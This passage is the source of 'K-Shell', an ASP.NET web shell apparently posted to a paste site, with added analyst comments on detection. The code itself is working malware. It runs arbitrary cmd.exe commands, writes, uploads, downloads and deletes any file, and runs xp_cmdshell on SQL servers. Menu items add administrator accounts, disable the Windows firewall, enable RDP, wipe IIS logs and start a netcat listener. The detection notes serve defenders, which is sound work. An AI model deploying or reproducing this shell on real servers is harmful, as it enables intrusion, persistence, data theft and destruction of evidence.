
K-Shell by XXx_Death_xXX ZHC

a guest
May 17th, 2013
  1. <%@ Page Language="VB" ContentType="text/html" validateRequest="false" aspcompat="true"%>
  2. <%@ Import Namespace="System.IO" %>
  3. <%@ import namespace="System.Diagnostics" %>
  4. <script runat="server">
     ' Analyst notes on the page header:
     ' - validateRequest="false" switches off ASP.NET request validation for this page, so posted
     '   values containing markup are accepted as-is.
     ' - aspcompat="true" is set, and the page later creates ADODB.Connection and adodb.stream
     '   through Server.CreateObject.
     ' - System.Diagnostics is imported for the Process/ProcessStartInfo calls in the RunCMD handlers.
     ' These attributes together with the literal below are static strings that can be matched when
     ' scanning web roots for this file.
  5. Dim PASSWORD as string = "XXx_Death_xXX" 'Here , change the default password "XXx_Death_xXX" to yours
     ' Hard-coded shared secret, compared in clear text by Login_click. The same literal is reused
     ' as the session key that marks a logged-in session.
  6.  
  7. '----------------------------------------------------------------------
  8. '----------------- K-Shell by XXx_Death_xXX ZHC -----------------
  9. '----------------- E-mail: [email protected] -----------------
  10. '----------------- http://zone-hack.com -----------------
  11. '----------------- Version 1.0 -----------------
  12. '----------------- Build (2011-10-10) -----------------
  13. '----------- This shell base on WebAdmin2.0(beta) By lake2 ------------
  14. '------------ and Asp.Net Security Analyzer by Dinis.cruz ------------
  15. '----------------------------------------------------------------------
  16.  
  17.  
  18. dim url,TEMP1,TEMP2,TITLE as string
      ' Page-level fields: url is assigned by NewFD and Rename, TEMP1/TEMP2 by xexistdir, and TITLE by
      ' the inline code block after the script section.
  19. Sub Login_click(sender As Object, E As EventArgs)
      ' Click handler for the login button. Compares the submitted text box value with PASSWORD by
      ' plain string equality; on a match it sets session("XXx_Death_xXX")=1 and a 45-minute session
      ' timeout. That session value is what the download branch and the main UI check before running.
      ' No attempt counter, lockout or logging is present in this handler.
  20. if Textbox.Text=PASSWORD then
  21. session("XXx_Death_xXX")=1
  22. session.Timeout=45
  23. else
  24. response.Write("<font color='red'>Your password is incorrect! Please check your password and try again.</font><br>")
  25. end if
  26. End Sub
  27. Sub RunCMD(Src As Object, E As EventArgs)
      ' Click handler that executes the Cmd text box value as "cmd.exe /c <text>" in a child process
      ' of the web application and shows the captured standard output in the result label.
      ' Only standard output is redirected; standard error is not captured.
      ' Detection: the command interpreter is started by the ASP.NET worker process (typically
      ' w3wp.exe under IIS, confirm for the host), so process-creation telemetry with that
      ' parent/child pair is the primary signal for this handler.
  28. Dim myProcess As New Process()
  29. Dim myProcessStartInfo As New ProcessStartInfo("cmd.exe")
  30. myProcessStartInfo.UseShellExecute = False
  31. myProcessStartInfo.RedirectStandardOutput = true
  32. myProcess.StartInfo = myProcessStartInfo
      ' The request-supplied text is concatenated directly into the argument string.
  33. myProcessStartInfo.Arguments="/c " & Cmd.text
  34. myProcess.Start()
  35. Dim myStreamReader As StreamReader = myProcess.StandardOutput
  36. Dim myString As String = myStreamReader.Readtoend()
  37. myProcess.Close()
      ' As written, ">" is mapped to &lt; and "<" to &gt;.
  38. mystring=replace(mystring,">","&lt;")
  39. mystring=replace(mystring,"<","&gt;")
      ' The submitted command text is echoed back into the label without HTML encoding.
  40. result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
  41. Cmd.text=""
  42. End Sub
  43. Sub RunCMD2(Src As Object, E As EventArgs)
      ' Same flow as RunCMD, reading the command from the Cmd2 text box. In the "cmd2" form further
      ' down the page that box is pre-filled with a netcat listener command, so relevant telemetry
      ' is a new listening socket opened by a child of the web worker process.
      ' Output is assigned to the label named result.
  44. Dim myProcess2 As New Process()
  45. Dim myProcessStartInfo2 As New ProcessStartInfo("cmd.exe")
  46. myProcessStartInfo2.UseShellExecute = False
  47. myProcessStartInfo2.RedirectStandardOutput = true
  48. myProcess2.StartInfo = myProcessStartInfo2
  49. myProcessStartInfo2.Arguments="/c " & Cmd2.text
  50. myProcess2.Start()
  51. Dim myStreamReader2 As StreamReader = myProcess2.StandardOutput
  52. Dim myString2 As String = myStreamReader2.Readtoend()
  53. myProcess2.Close()
  54. mystring2=replace(mystring2,">","&lt;")
  55. mystring2=replace(mystring2,"<","&gt;")
  56. result.text=Cmd2.text & vbcrlf & "<pre>" & mystring2 & "</pre>"
  57. Cmd2.text=""
  58. End Sub
  59. Sub RunCMD3(Src As Object, E As EventArgs)
      ' Same flow as RunCMD, reading the command from the Cmd3 text box. The "cmd3" form pre-fills
      ' that box with a command deleting IIS log files, i.e. this entry is the page's log-removal
      ' action. Gaps in the W3SVC log sequence, or deletion events on the log directory, are the
      ' artefacts to look for; logs forwarded off-host are unaffected.
      ' Output is assigned to the label named result.
  60. Dim myProcess3 As New Process()
  61. Dim myProcessStartInfo3 As New ProcessStartInfo("cmd.exe")
  62. myProcessStartInfo3.UseShellExecute = False
  63. myProcessStartInfo3.RedirectStandardOutput = true
  64. myProcess3.StartInfo = myProcessStartInfo3
  65. myProcessStartInfo3.Arguments="/c " & Cmd3.text
  66. myProcess3.Start()
  67. Dim myStreamReader3 As StreamReader = myProcess3.StandardOutput
  68. Dim myString3 As String = myStreamReader3.Readtoend()
  69. myProcess3.Close()
  70. mystring3=replace(mystring3,">","&lt;")
  71. mystring3=replace(mystring3,"<","&gt;")
  72. result.text=Cmd3.text & vbcrlf & "<pre>" & mystring3 & "</pre>"
  73. Cmd3.text=""
  74. End Sub
  75. Sub RunCMD4(Src As Object, E As EventArgs)
      ' Same flow as RunCMD, reading the command from the Cmd4 text box. The "cmd4" form pre-fills
      ' it with a reg.exe command that sets fDenyTSConnections to 0 under the Terminal Server key,
      ' which turns Remote Desktop connections on. Registry auditing on that value and reg.exe
      ' launched beneath the web worker process are the matching signals.
      ' Output is assigned to the label named result.
  76. Dim myProcess4 As New Process()
  77. Dim myProcessStartInfo4 As New ProcessStartInfo("cmd.exe")
  78. myProcessStartInfo4.UseShellExecute = False
  79. myProcessStartInfo4.RedirectStandardOutput = true
  80. myProcess4.StartInfo = myProcessStartInfo4
  81. myProcessStartInfo4.Arguments="/c " & Cmd4.text
  82. myProcess4.Start()
  83. Dim myStreamReader4 As StreamReader = myProcess4.StandardOutput
  84. Dim myString4 As String = myStreamReader4.Readtoend()
  85. myProcess4.Close()
  86. mystring4=replace(mystring4,">","&lt;")
  87. mystring4=replace(mystring4,"<","&gt;")
  88. result.text=Cmd4.text & vbcrlf & "<pre>" & mystring4 & "</pre>"
  89. Cmd4.text=""
  90. End Sub
  91. Sub RunCMD5(Src As Object, E As EventArgs)
      ' Same flow as RunCMD, reading the command from the Cmd5 text box. The "cmd5" form pre-fills
      ' it with a "net user ... /add" template, i.e. local account creation. On Windows this is
      ' recorded as Security event 4720 when account-management auditing is enabled.
      ' Output is assigned to the label named result.
  92. Dim myProcess5 As New Process()
  93. Dim myProcessStartInfo5 As New ProcessStartInfo("cmd.exe")
  94. myProcessStartInfo5.UseShellExecute = False
  95. myProcessStartInfo5.RedirectStandardOutput = true
  96. myProcess5.StartInfo = myProcessStartInfo5
  97. myProcessStartInfo5.Arguments="/c " & Cmd5.text
  98. myProcess5.Start()
  99. Dim myStreamReader5 As StreamReader = myProcess5.StandardOutput
  100. Dim myString5 As String = myStreamReader5.Readtoend()
  101. myProcess5.Close()
  102. mystring5=replace(mystring5,">","&lt;")
  103. mystring5=replace(mystring5,"<","&gt;")
  104. result.text=Cmd5.text & vbcrlf & "<pre>" & mystring5 & "</pre>"
  105. Cmd5.text=""
  106. End Sub
  107. Sub RunCMD6(Src As Object, E As EventArgs)
       ' Same flow as RunCMD, reading the command from the Cmd6 text box. The "cmd6" form pre-fills
       ' it with a "net localgroup Administrators ... /add" template, i.e. adding an account to the
       ' local Administrators group. With account-management auditing enabled this is recorded as
       ' Security event 4732.
       ' Output is assigned to the label named result.
  108. Dim myProcess6 As New Process()
  109. Dim myProcessStartInfo6 As New ProcessStartInfo("cmd.exe")
  110. myProcessStartInfo6.UseShellExecute = False
  111. myProcessStartInfo6.RedirectStandardOutput = true
  112. myProcess6.StartInfo = myProcessStartInfo6
  113. myProcessStartInfo6.Arguments="/c " & Cmd6.text
  114. myProcess6.Start()
  115. Dim myStreamReader6 As StreamReader = myProcess6.StandardOutput
  116. Dim myString6 As String = myStreamReader6.Readtoend()
  117. myProcess6.Close()
  118. mystring6=replace(mystring6,">","&lt;")
  119. mystring6=replace(mystring6,"<","&gt;")
  120. result.text=Cmd6.text & vbcrlf & "<pre>" & mystring6 & "</pre>"
  121. Cmd6.text=""
  122. End Sub
  123. Sub RunCMD7(Src As Object, E As EventArgs)
       ' Same flow as RunCMD, reading the command from the Cmd7 text box. The "cmd7" form pre-fills
       ' it with a reg.exe command that sets EnableFirewall to 0 under the SharedAccess
       ' FirewallPolicy\StandardProfile key, i.e. it turns the Windows firewall profile off.
       ' Registry auditing on that value and firewall state monitoring cover this action.
       ' Output is assigned to the label named result.
  124. Dim myProcess7 As New Process()
  125. Dim myProcessStartInfo7 As New ProcessStartInfo("cmd.exe")
  126. myProcessStartInfo7.UseShellExecute = False
  127. myProcessStartInfo7.RedirectStandardOutput = true
  128. myProcess7.StartInfo = myProcessStartInfo7
  129. myProcessStartInfo7.Arguments="/c " & Cmd7.text
  130. myProcess7.Start()
  131. Dim myStreamReader7 As StreamReader = myProcess7.StandardOutput
  132. Dim myString7 As String = myStreamReader7.Readtoend()
  133. myProcess7.Close()
  134. mystring7=replace(mystring7,">","&lt;")
  135. mystring7=replace(mystring7,"<","&gt;")
  136. result.text=Cmd7.text & vbcrlf & "<pre>" & mystring7 & "</pre>"
  137. Cmd7.text=""
  138. End Sub
  139. sub Editor(Src As Object, E As EventArgs)
       ' Save handler of the file editor: writes the content text box to the path held in the
       ' filepath text box, replacing any existing file (append=false) with the default encoding.
       ' Both the path and the content come from the request, so this is an arbitrary file write
       ' with the rights of the web application's identity. File-integrity monitoring on the web
       ' root and on script-mapped extensions is the matching control.
  140. dim mywrite as new streamwriter(filepath.text,false,encoding.default)
  141. mywrite.write(content.text)
  142. mywrite.close
       ' The path is placed into the emitted script with only backslashes doubled; quotes are not
       ' escaped. The browser is then sent back to the parent directory listing.
  143. response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
  144. end sub
  145. Sub UpLoad(Src As Object, E As EventArgs)
       ' Upload handler: stores the posted file under the directory given in the "src" query-string
       ' parameter, using the file name component of the client-supplied name. The only check is
       ' that the target does not already exist; no extension, size or location restriction is
       ' applied. New files appearing in served directories, written by the worker process, are
       ' the artefact this leaves behind.
  146. dim filename,loadpath as string
  147. filename=path.getfilename(UpFile.value)
  148. loadpath=request.QueryString("src") & filename
  149. if file.exists(loadpath)=true then
  150. response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
  151. response.End()
  152. end if
  153. UpFile.postedfile.saveas(loadpath)
       ' The confirmation dialog echoes the client path, size in bytes and server save path.
  154. response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
  155. response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
  156. End Sub
  157.  
  158. Sub NewFD(Src As Object, E As EventArgs)
       ' Handler of the "new" form: creates either an empty file or a directory named by the NewName
       ' text box beneath the directory posted in the form field "src". For a file it opens a
       ' StreamWriter with append=false (truncating any existing file) and redirects to the editor;
       ' for a directory it reports success and returns to the listing. No validation of the
       ' resulting path is performed.
  159. url=request.form("src")
  160. if NewFile.Checked = True then
  161. dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
  162. mywrite.close
  163. response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
  164. else
  165. directory.createdirectory(url & NewName.Text)
  166. response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
  167. end if
  168. End Sub
  169. Sub del(a)
       ' Deletes the path a. A trailing backslash marks a directory: every file in it is deleted,
       ' each subdirectory is removed by a recursive call, then the directory itself is deleted.
       ' Without a trailing backslash a is deleted as a single file. There is no confirmation on the
       ' server side and no restriction on which path may be passed.
  170. if right(a,1)="\" then
  171. dim xdir as directoryinfo
  172. dim mydir as new DirectoryInfo(a)
  173. dim xfile as fileinfo
  174. for each xfile in mydir.getfiles()
  175. file.delete(a & xfile.name)
  176. next
  177. for each xdir in mydir.getdirectories()
  178. call del(a & xdir.name & "\")
  179. next
  180. directory.delete(a)
  181. else
  182. file.delete(a)
  183. end if
  184. End Sub
  185. Sub copydir(a,b)
       ' Recursively copies the contents of directory a into directory b. Files are copied first;
       ' for each subdirectory the matching target directory is created and copydir is called again.
       ' Paths are built by string concatenation, so b is expected to end with a backslash
       ' (the recursive call passes it that way).
  186. dim xdir as directoryinfo
  187. dim mydir as new DirectoryInfo(a)
  188. dim xfile as fileinfo
  189. for each xfile in mydir.getfiles()
  190. file.copy(a & "\" & xfile.name,b & xfile.name)
  191. next
  192. for each xdir in mydir.getdirectories()
  193. directory.createdirectory(b & path.getfilename(a & xdir.name))
  194. call copydir(a & xdir.name & "\",b & xdir.name & "\")
  195. next
  196. End Sub
  197. Sub xexistdir(temp,ow)
       ' Name-collision handling for the paste action. When temp already exists as a file or
       ' directory:
       '   ow=0     -> redirect to the "samename" action for the current url
       '   ow=1     -> delete the existing target through del
       '   otherwise -> pick an alternative target name prefixed with the current second, stored in
       '                TEMP1 (directory source) or TEMP2 (file source)
       ' NOTE(review): the replace(d,"","") calls have an empty search string in this copy of the
       ' paste; a marker character may have been lost when the text was published. Unconfirmed.
  198. if directory.exists(temp)=true or file.exists(temp)=true then
  199. if ow=0 then
  200. response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
  201. elseif ow=1 then
  202. del(temp)
  203. else
  204. dim d as string = session("cutboard")
  205. if right(d,1)="\" then
  206. TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  207. else
  208. TEMP2=url & second(now) & replace(path.getfilename(d),"","")
  209. end if
  210. end if
  211. end if
  212. End Sub
  213. Sub existdir(temp)
       ' Guard used before file-system actions: when temp is neither an existing file nor an existing
       ' directory, a fixed message is written and the response is ended.
  214. if file.exists(temp)=false and directory.exists(temp)=false then
  215. response.Write("<center>This drive is not an accessible drive...</center>")
  216. response.End()
  217. end if
  218. End Sub
  219. Sub RunSQLCMD(Src As Object, E As EventArgs)
       ' Handler of the "sqlrootkit" form: opens an ADODB connection through the SQLOLEDB provider
       ' with host, user name and password taken from the form, then runs the Sqlcmd text through
       ' master.dbo.xp_cmdshell and displays the first column of every returned row.
       ' Detection and hardening: xp_cmdshell should stay disabled and its configuration changes and
       ' executions audited; cmd.exe started by the SQL Server service process is the host-side
       ' signal; outbound SQL logins originating from the web server with supplied credentials are
       ' the network-side signal.
  220. Dim adoConn,strQuery,recResult,strResult
  221. if SqlName.Text<>"" then
  222. adoConn=Server.CreateObject("ADODB.Connection")
       ' The connection string is assembled from the raw form values.
  223. adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text)
  224. If Sqlcmd.Text<>"" Then
       ' The statement is built by concatenating the form text between single quotes.
  225. strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
  226. recResult = adoConn.Execute(strQuery)
  227. If NOT recResult.EOF Then
  228. Do While NOT recResult.EOF
  229. strResult = strResult & chr(13) & recResult(0).value
  230. recResult.MoveNext
  231. Loop
  232. End if
  233. recResult = Nothing
       ' Spaces and angle brackets in the output are HTML-encoded before display.
  234. strResult = Replace(strResult," ","&nbsp;")
  235. strResult = Replace(strResult,"<","&lt;")
  236. strResult = Replace(strResult,">","&gt;")
  237. resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
  238. SqlCMD.Text=""
  239. End if
  240. adoConn.Close
  241. End if
  242. End Sub
  243. Function GetStartedTime(ms)
       ' Converts a millisecond count to hours (ms / 3,600,000) and converts the result with CInt.
       ' The information view calls it with Environment.Tickcount.
  244. GetStartedTime=cint(ms/(1000*60*60))
  245. End function
  246. Function getIP()
       ' Returns the address shown as "Client IP" in the information view. REMOTE_ADDR is used when
       ' the X-Forwarded-For header is empty or contains "unknown"; otherwise the first entry of
       ' X-Forwarded-For (split on "," or ";") is taken. The result is cut to 30 characters and
       ' trimmed. X-Forwarded-For is supplied by the client or an intermediate proxy, so the value
       ' is not authoritative.
  247. Dim strIPAddr as string
  248. If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
  249. strIPAddr = Request.ServerVariables("REMOTE_ADDR")
  250. ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
  251. strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
  252. ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
  253. strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
  254. Else
  255. strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
  256. End If
  257. getIP = Trim(Mid(strIPAddr, 1, 30))
  258. End Function
  259. Function Getparentdir(nowdir)
       ' Returns the parent of nowdir as a string ending in a backslash. When nowdir is longer than
       ' four characters its last character is dropped first. The loop then walks
       ' over every backslash; on exit k is the position of the last backslash plus two, so
       ' mid(nowdir,1,k-2) is everything up to and including that backslash. When no backslash is
       ' found (k stays 2) nowdir is returned unchanged.
  260. dim temp,k as integer
  261. temp=1
  262. k=0
  263. if len(nowdir)>4 then
  264. nowdir=left(nowdir,len(nowdir)-1)
  265. end if
  266. do while temp<>0
  267. k=temp+1
  268. temp=instr(temp,nowdir,"\")
  269. if temp =0 then
  270. exit do
  271. end if
  272. temp = temp+1
  273. loop
  274. if k<>2 then
  275. getparentdir=mid(nowdir,1,k-2)
  276. else
  277. getparentdir=nowdir
  278. end if
  279. End function
  280. Function Rename()
       ' Renames the file named in the "src" query-string parameter to the posted form value "name"
       ' inside the same parent directory. Returns 0 when the target already exists; otherwise the
       ' file is copied to the new name, the original is removed through del, and 1 is returned.
       ' Only file.copy is used, so this path handles files, not directories.
  281. url=request.QueryString("src")
  282. if file.exists(Getparentdir(url) & request.Form("name")) then
  283. rename=0
  284. else
  285. file.copy(url,Getparentdir(url) & request.Form("name"))
  286. del(url)
  287. rename=1
  288. end if
  289. End Function
  290. Function GetSize(temp)
       ' Formats a byte count for the directory listing: values below 1024 are shown in bytes, larger
       ' ones in KB, MB or GB using integer division by 1024 at each step (fractions are dropped).
  291. if temp < 1024 then
  292. GetSize=temp & " bytes"
  293. else
  294. if temp\1024 < 1024 then
  295. GetSize=temp\1024 & " KB"
  296. else
  297. if temp\1024\1024 < 1024 then
  298. GetSize=temp\1024\1024 & " MB"
  299. else
  300. GetSize=temp\1024\1024\1024 & " GB"
  301. end if
  302. end if
  303. end if
  304. End Function
  305. Sub downTheFile(thePath)
       ' Sends the file at thePath to the browser as an attachment. The file is loaded in full into
       ' an ADODB.Stream opened in binary mode (type=1), the Content-Disposition and Content-Length
       ' headers are set, the bytes are written and the response is ended. thePath is taken from the
       ' query string by the caller, so any file readable by the web application's identity can be
       ' retrieved. Large responses with application/octet-stream from an .aspx URL carrying
       ' "action=down" are the matching web-log pattern.
  306. dim stream
  307. stream=server.createObject("adodb.stream")
  308. stream.open
  309. stream.type=1
  310. stream.loadFromFile(thePath)
  311. response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
  312. response.addHeader("Content-Length",stream.Size)
  313. response.charset="UTF-8"
  314. response.contentType="application/octet-stream"
  315. response.binaryWrite(stream.read)
  316. response.flush
  317. stream.close
  318. stream=nothing
  319. response.End()
  320. End Sub
  321. </script>
  322. <%
       ' Runs before any markup is sent. A request with action=down from a session that carries the
       ' login flag is answered directly with the file named in "src".
  323. if request.QueryString("action")="down" and session("XXx_Death_xXX")=1 then
  324. downTheFile(request.QueryString("src"))
  325. response.End()
  326. end if
       ' Picks the TITLE string from the "action" query-string value. The action names handled here
       ' (cmd, sqlrootkit, clonetime, information, goto) appear in request URLs and can be searched
       ' for in web server logs.
  327. Dim hu as string = request.QueryString("action")
  328. if hu="cmd" then
  329. TITLE="CMD.NET"
  330. elseif hu="sqlrootkit" then
  331. TITLE="zone-hack.com.NET"
  332. elseif hu="clonetime" then
  333. TITLE="Clone Time"
  334. elseif hu="information" then
  335. TITLE="Web Server Info"
  336. elseif hu="goto" then
       ' The numeric character references below decode to "aspx zhc shell by xxx_death_xxx::2011".
  337. TITLE="&#097;&#115;&#112;&#120;&#032;&#122;&#104;&#099;&#032;&#115;&#104;&#101;&#108;&#108;&#032;&#098;&#121;&#032;&#120;&#120;&#120;&#095;&#100;&#101;&#097;&#116;&#104;&#095;&#120;&#120;&#120;::&#050;&#048;&#049;&#049;"
  338. else
  339. TITLE=request.ServerVariables("HTTP_HOST")
  340. end if
  341. %>
  342. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  343. <html>
  344. <p align="center"><img alt="" title="" src="http://img851.imageshack.us/img851/2304/bismillahus.jpg" /><br />
  345.  
  346. </p>
  347.  
  348. <div align="center"></div>
  349. <style type="text/css">
  350. body,td,th {
  351. color: #FFFFFF;
  352. font-family: Comic Sans Ms;
  353. }
  354. body {
  355. background-image: url("http://a6.sphotos.ak.fbcdn.net/hphotos-ak-snc6/262108_109964339097628_100002521874736_97359_1521760_n.jpg");
  356. background-position: center center;
  357. background-repeat: no-repeat;
  358. background-color: #000000;
  359. background-attachment: fixed;
  360. font-family: Comic Sans MS;
  361. font-size: 16px;
  362. }
  363. a:link {
  364. color: #FFFFFF;
  365. text-decoration: none;
  366. }
  367. a:visited {
  368. text-decoration: none;
  369. color: #FFFFFF;
  370. }
  371. a:hover {
  372. text-decoration: none;
  373. color: #00FF00;
  374. }
  375. a:active {
  376. text-decoration: none;
  377. color: #00FF00;
  378. }
  379. .button {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
  380. .TextBox {border: 1px solid #084B8E}
  381. .style3 {color: #00FF00}
  382. .text {font-family: Comic Sans MS; font-size: 18px}
  383. .title {font-family: Comic Sans MS; font-size: 22px;}
  384. .footer {font-size: 12px;}
  385. </style>
  386. <head>
  387. <meta http-equiv="Content-Type" content="text/html">
  388. <title>Aspx Shell By XXx_Death_xXX & ZHC</title>
  389. </head>
  390. <body>
  391. <%
  392. Dim error_x as Exception
  393. Try
  394. if session("XXx_Death_xXX")<>1 then
  395. response.Write("<br>")
  396. response.Write("<center><span class=""title""><b>Welcome to ZCompany Hacking Crew Shell</b></span></center><br>")
  397. response.Write("<center><span class=""style3"">Note:</span> You MUST click the login button and not hit enter.</center>")
  398. %>
  399. <form runat="server">
  400. <br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
  401. <center>Password:<asp:TextBox ID="TextBox" runat="server" TextMode="Password" class="TextBox" />
  402. <asp:Button ID="Button" runat="server" Text="Login" ToolTip="Click here to login" OnClick="login_click" class="button" /></center>
  403. </form>
  404. <%
  405. else
  406. dim temp as string
  407. temp=request.QueryString("action")
  408. if temp="" then temp="goto"
  409. select case temp
  410. case "goto"
  411. if request.QueryString("src")<>"" then
  412. url=request.QueryString("src")
  413. else
  414. url=server.MapPath(".") & "\"
  415. end if
  416. call existdir(url)
  417. dim xdir as directoryinfo
  418. dim mydir as new DirectoryInfo(url)
  419. dim hupo as string
  420. dim xfile as fileinfo
  421. %>
  422. <p align="center">Current Directory: <font color= #00FF00><%=url%></font></p>
  423. <table width="75%" border="0" align="center">
  424. <tr>
  425. <td width="13%">Action:</td>
  426. <td width="87%">
  427. <a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> |
  428. <a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file"> Upload</a> |
  429. <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory"> Index Root</a> |
  430. <a href="?action=logout" title="Exit"> Exit</a></td>
  431. </tr>
  432. <tr>
  433. <td>
  434. Drive: </td>
  435. <td>
  436. <%
  437. dim i as integer
  438. for i =0 to Directory.GetLogicalDrives().length-1
  439. response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
  440. next
  441. %>
  442. </td>
  443. </tr>
  444.  
  445. <tr>
  446. <td>Tools:</td>
  447. <td><a href="?action=sqlrootkit" target="_blank">SQL Command</a> |<a href="?action=cmd" target="_blank"> Command Line</a> |<a href="?action=information" target="_blank"> System Information</a></td>
  448. </tr>
  449.  
  450. <tr>
  451. <td width="20%">Admin Tricks: </td>
  452. <td width="80%"><a href="?action=cmd5" target="_blank">Add User</a> |<a href="?action=cmd6" target="_blank"> Add User To Administrators Group</a> |<a href="?action=cmd7" target="_blank"> Disable Windows Firewall</a> |<a href="?action=cmd4" target="_blank"> Enable RDP</a> |<a href="?action=cmd3" target="_blank"> Wipe IIS Logs</a></td>
  453.  
  454. </tr>
  455.  
  456. <tr>
  457. <td width="20%">Silentz's Tricks: </td>
  458. <td width="80%"><a href="?action=cmd2" target="_blank">Start NC</a></td>
  459. </tr>
  460. </table>
  461. <hr noshade width="70%">
  462. <table width="90%" border="0" align="center">
  463. <tr>
  464. <td width="30%"><strong>Name</strong></td>
  465. <td width="10%"><strong>Size</strong></td>
  466. <td width="20%"><strong>Last Modified</strong></td>
  467. <td width="25%"><strong>Action</strong></td>
  468. </tr>
  469. <tr>
  470. <td><%
  471. hupo= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><i>|Parent Directory|</i></a></td></tr>"
  472. response.Write(hupo)
  473. for each xdir in mydir.getdirectories()
  474. response.Write("<tr>")
  475. dim filepath as string
  476. filepath=server.UrlEncode(url & xdir.name)
  477. hupo= "<td><a href='?action=goto&src=" & filepath & "\" & "'>" & xdir.name & "</a></td>"
  478. response.Write(hupo)
  479. response.Write("<td>&lt;dir&gt;</td>")
  480. response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
  481. hupo="<td><a href='?action=cut&src=" & filepath & "\' target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\' target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
  482. response.Write(hupo)
  483. response.Write("</tr>")
  484. next
  485. %></td>
  486. </tr>
  487. <tr>
  488. <td><%
  489. for each xfile in mydir.getfiles()
  490. dim filepath2 as string
  491. filepath2=server.UrlEncode(url & xfile.name)
  492. response.Write("<tr>")
  493. hupo="<td>" & xfile.name & "</td>"
  494. response.Write(hupo)
  495. hupo="<td>" & GetSize(xfile.length) & "</td>"
  496. response.Write(hupo)
  497. response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
  498. hupo="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"
  499. response.Write(hupo)
  500. response.Write("</tr>")
  501. next
  502. response.Write("</table>")
  503. %></td>
  504. </tr>
  505.  
  506. <tr>
  507. <td><hr noshade width="70%"></td>
  508. </tr>
  509. </table>
  510. <script language="javascript">
  511. function del()
  512. {
  513. if(confirm("Are you sure?")){return true;}
  514. else{return false;}
  515. }
  516. function down()
  517. {
  518. if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
  519. else{return false;}
  520. }
  521. </script>
  522. <%
  523. case "information"
  524. dim CIP,CP as string
  525. if getIP()<>request.ServerVariables("REMOTE_ADDR") then
  526. CIP=getIP()
  527. CP=request.ServerVariables("REMOTE_ADDR")
  528. else
  529. CIP=request.ServerVariables("REMOTE_ADDR")
  530. CP="None"
  531. end if
  532. %>
  533. <center><p>[ System information ]</p><br/>
  534. <table width="80%" border="1" align="center">
  535. <tr>
  536. <td colspan="2"><span class="style3"><b>Web Server Information</b></span></td>
  537. </tr>
  538. <tr>
  539. <td width="40%">Server IP</td>
  540. <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
  541. </tr>
  542. <tr>
  543. <td height="73">Machine Name</td>
  544. <td><%=Environment.MachineName%></td>
  545. </tr>
  546. <tr>
  547. <td>Network Name</td>
  548. <td><%=Environment.UserDomainName.ToString()%></td>
  549. </tr>
  550. <tr>
  551. <td>User Name in this Process</td>
  552. <td><%=Environment.UserName%></td>
  553. </tr>
  554. <tr>
  555. <td>OS Version</td>
